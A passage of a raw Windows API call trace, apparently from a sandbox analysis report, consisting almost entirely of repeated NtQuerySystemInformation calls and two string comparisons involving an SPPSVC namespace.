SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0241.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0241.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0241.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0241.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0241.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0241.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0241.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0241.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0241.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0241.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0241.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0241.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0241.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0241.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0241.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0241.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0241.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0241.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e880, Length=0x20, ResultLength=0x0) [0241.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0241.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0241.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0241.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0241.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0241.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.167] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0241.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0241.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0241.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0241.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0241.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0241.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0241.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0241.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0241.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0241.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0241.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0241.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0241.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0241.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0241.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0241.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0241.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0241.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0241.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0241.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0241.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0241.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.176] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0241.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0241.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0241.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0241.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0241.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0241.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0241.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0241.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0241.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0241.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0241.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.182] NtQuerySystemInformation (SystemInformationClass=0xb9, 